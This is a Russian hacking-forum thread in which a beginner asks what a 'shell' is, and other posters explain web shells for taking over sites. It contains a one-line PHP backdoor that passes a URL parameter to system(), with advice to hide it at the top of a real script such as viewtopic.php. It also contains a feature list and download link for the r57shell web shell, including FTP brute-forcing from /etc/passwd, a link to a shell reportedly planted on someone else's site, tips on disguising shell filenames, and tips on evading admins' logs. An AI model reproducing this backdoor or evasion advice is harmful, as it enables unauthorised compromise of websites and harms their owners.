|
Обьясните ломаку, что такое Shell??
Ну я понимаю для хака сайтов, но что это такое и с чем его едят....:-\ :confused:
|
"Доступ в shell" - доступ к командной строке операционной системы UNIX, на которой размещен Ваш виртуальный сервер. Если Ваш тарифный план включает доступ в shell, вы можете попасть в него, соединившись с сервером www.ВАШ_ДОМЕН.ru (подставьте настоящее имя Вашего сайта по аналогии) по протоколу SSH с помощью программ SSH или OpenSSH. Под Windows протокол SSH поддерживают программы бесплатной Putty (последнюю версию можно свободно загрузить с ресурса www.chiark.greenend.org.uk). Получив доступ в shell, Вы можете выполнять редактирование и отладку Ваших страниц и скриптов прямо на виртуальном сервере."
|
Шелл скрипт который позволяет управлять сайтом(возможно даже не своим).
Т.е. создавать там файлы, кароче что-то типо проводника ,или файлового менеджера,в принципе что-то отдаленное, ну хз я незнаю как объяснить. Тебе наверное надо хоть раз его увидеть прежде понять что это такое |
Что типа проводника в винде, только круче
http://razrushitel.front.ru/pic/forum8.jpg Новая версия r57shell 1.24 В новой версии добавлено: ~ скачивание файлов с сервера на котором работает скрипт на локальный компьютер пользователя ~ поддержка архивирования передаваемого с сервера файла в zip, bzip или gzip ~ скачивание файлов с удаленного ftp сервера ~ отправка файлов на удаленный ftp сервер ~ брутфорс ftp сервера, в качестве логина и пароля используется имя пользователя из /etc/passwd ~ возможность использовать перевернутое (user -> resu) имя пользователя в качестве пароля при ftp-брутфорсе ~ вывод списка пользователей из /etc/passwd ~ отправка файлов аттачем на почту ~ отправка писем ~ свертывание/развертывание разделов http://rst.void.ru/download/r57shell.txt |
http://w*w*w.paksquash.com/index.php...nm.ru/conf.php
На вот, посмотри )))) Это уже залитый shell на сайт, только ты там не разберёшься, там кодировачка то не та ;) Ток не забудь звёздочки убрать в ссылке )))) |
Цитата:
А вообще я теперь всё понял!!! Всем спасибо...и ещё одно, если админ найдёт shell, то он его удалит, да? |
а вот интересно какое имя вы даете залитому шелу , я обычно img )) или как у •••™NO FEAR™••• conf.php ))
---------- Цитата:
|
естественно удалит. Это вообще-то противозаконно :rolleyes:
|
я view.php всегда даю имя
|
Самый лучший способ - прописать в начало какого-то скрипта реального, вроде viewtopic.php код вроде такого:
if (isset( $_GET["c"] )) { print "<pre>"; system( $_GET['c'] ); print "</pre>"; } |
А не через POST? =)
Get в логах будет светиться) Ребят.. ну вы даете!!! При первой же возможности выдали названия своих шеллов! Ща какой-нить умник введет в гугл запрос с этими именами и плакали ваши шеллы.. |
название шеллов не секрет ни для кого,какие они должы быть.
и стратегически важные объекты, естесвенно запоролены =)) |
Цитата:
А по стандартным названиям в гугле конечно много можно найти. |
Цитата:
|
Цитата:
|
Не бред! Мне сказали, что админ пытается найти того, кто ему на сайт залил шелл, ну я и спрашиваю как он будет искать!!!
|
2 S.H. Ну всё что может быть у админа это твой ИП (или не твой, если ты об этом позаботился). Ну и ещё логи сайта, где иногда можно увидеть с какого сайта ты залил шелл. Всмысле твой сайт узнать.
Просто за залитый шелл он наврядли будет тебя искать, если он не админ Пентагона. Плюс информация об ИП может даваться провайдером только правоохранительным органам, а не всем админам. |
А мне один раз регразили что передадут инфо обомне в управление "К"
я чють в штаны не наделал неделю в инет не лазил. Но оказалась просто запугали, действено |
Цитата:
|
по-моему самое простое объяснение шелла -
удаленное управление каким-либо сервером а лучше зарегить бесплатный шелл и полазить тама |
| Время: 15:22 |